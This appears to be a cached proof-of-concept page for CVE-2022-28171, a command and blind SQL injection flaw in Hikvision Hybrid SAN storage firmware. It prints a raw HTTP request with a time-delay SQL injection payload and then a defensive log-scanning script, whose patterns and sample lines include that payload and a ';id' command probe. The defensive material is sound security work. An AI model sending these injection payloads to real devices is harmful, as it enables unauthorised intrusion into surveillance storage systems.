POC details: 3eb39296d6a4a9e53244528bd47e58b73b308897

Source
Related vulnerability
Title: Hikvision Hybrid SAN/Cluster Storage command injection vulnerability (CVE-2022-28171)
Description: Hikvision Hybrid SAN/Cluster Storage Products are a series of economical and reliable hybrid SAN (storage area network) products from the Chinese company Hikvision. Hikvision Hybrid SAN/Cluster Storage contains a security vulnerability caused by insufficient input validation in the web module. An attacker can exploit it to execute restricted commands by sending a message containing malicious commands.
Introduction
# CVE-2022-28171-POC

I originally published this on ExploitDB, which you can find at https://www.exploit-db.com/exploits/51607

### Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution

```
# Date: 16 July 2023
# Exploit Author: Thurein Soe
# CVE : CVE-2022-28171
# Reference Link: https://cve.report/CVE-2022-28171
# Vulnerable Versions:
Ds-a71024 Firmware
Ds-a71048r-cvs Firmware
Ds-a71048 Firmware
Ds-a71072r Firmware
Ds-a72024 Firmware
Ds-a72048r-cvs Firmware
Ds-a72072r Firmware
Ds-a80316s Firmware
Ds-a80624s Firmware
Ds-a81016s Firmware
Ds-a82024d Firmware
Ds-a71048r-cvs
Ds-a71024
Ds-a71048
Ds-a71072r
Ds-a80624s
Ds-a82024d
Ds-a80316s
Ds-a81016s
```
### Vendor Description:

Hikvision is a world-leading surveillance manufacturer and supplier of video surveillance and Internet of Things (IoT) equipment for civilian and military purposes. Some Hikvision Hybrid SAN products were vulnerable to multiple remote code execution vulnerabilities, including command injection, blind SQL injection, HTTP request smuggling, and reflected cross-site scripting. Together these allowed remote code execution, making it possible to run arbitrary operating system commands on the device.

### Vulnerability description
Manual testing confirmed that the "downloadtype" parameter was vulnerable to both blind SQL injection and command injection.
I created a Python script to automate and enumerate SQL versions, as the application was behind the firewall and blocked all requests from SQLmap.

### Request Body
```
Request Body:
GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)' HTTP/1.1
Host: X.X.X.X.12:2004
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close
```
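From the defender's side, the request above is also a usable detection signature: a log-download selector such as `downloadtype` should only ever carry a short keyword, so a time-delay SQL function or a shell metacharacter in that value is a strong indicator of probing. The following scanner is an added example for this page, not code from the PoC author or from Hikvision. It reads combined-format web access log lines (the log lines, IP addresses and the `WATCHED_PATH` constant are constructed here for illustration; the third sample line reproduces the payload shape shown in the request above) and reports which parameter of `dynamic_log.php` contained a suspicious value.

```python
"""Flag time-based blind SQL injection and shell-metacharacter probes against
/web/log/dynamic_log.php in web access logs.

Added example for this page (not the original PoC's code). Log format, hosts
and sample lines are constructed; only the endpoint and parameter name come
from the request shown on the page.
"""
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access log (combined log format). Line 3 mirrors the
# sleep(10) payload from the page; line 4 is a constructed ';'-separated probe.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Jul/2023:10:01:02 +0000] "GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype=syslog HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [16/Jul/2023:10:01:09 +0000] "GET /web/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [16/Jul/2023:10:02:41 +0000] "GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)' HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.9 - - [16/Jul/2023:10:02:55 +0000] "GET /web/log/dynamic_log.php?target=makeMaintainLog&downloadtype=syslog%3Bid HTTP/1.1" 200 77 "-" "Mozilla/5.0"
"""

# Combined log format: client ip, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Delay functions used for time-based blind SQL injection (MySQL, PostgreSQL, MSSQL).
TIME_BASED_RE = re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay", re.I)
# Shell metacharacters that a log-type selector should never contain.
SHELL_META_RE = re.compile(r"[;|`$]|&&")

# Endpoint from the request shown on the page.
WATCHED_PATH = "/web/log/dynamic_log.php"


def split_query(query):
    """Return (name, decoded value) pairs from a raw query string.

    Done by hand rather than with parse_qs so that a ';' inside a value is kept
    as part of the value (older parse_qs versions treat ';' as a separator).
    """
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote(name), unquote(value)))
    return pairs


def classify_value(value):
    """Label a decoded parameter value, or return None if it looks benign."""
    if TIME_BASED_RE.search(value):
        return "time_based_sqli"
    if SHELL_META_RE.search(value):
        return "shell_metachar"
    return None


def scan_log(text):
    """Scan access log text and return one finding per suspicious parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a recognisable access log line
        parts = urlsplit(m.group("target"))
        if parts.path != WATCHED_PATH:
            continue
        for name, value in split_query(parts.query):
            kind = classify_value(value)
            if kind:
                findings.append({
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "param": name,
                    "kind": kind,
                    "value": value,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['kind']:16} {f['param']}={f['value']!r}")
```

If the log format also records request duration (for example nginx's `$request_time`), a duration of roughly 10 seconds on this endpoint alongside a `time_based_sqli` finding corroborates that the delay function actually executed, which separates a successful probe from a blocked one.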
File snapshot

[4.0K] /data/pocs/3eb39296d6a4a9e53244528bd47e58b73b308897
├── [1.7K] BlindSQL_Injection.py.md
├── [1.9K] Command Injection.py.md
└── [1.9K] README.md

0 directories, 3 files

Cached for you by the Shenlong bot
Notes
    1. Access via the original source is recommended.
    2. If the source is unavailable or cannot be accessed, email f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.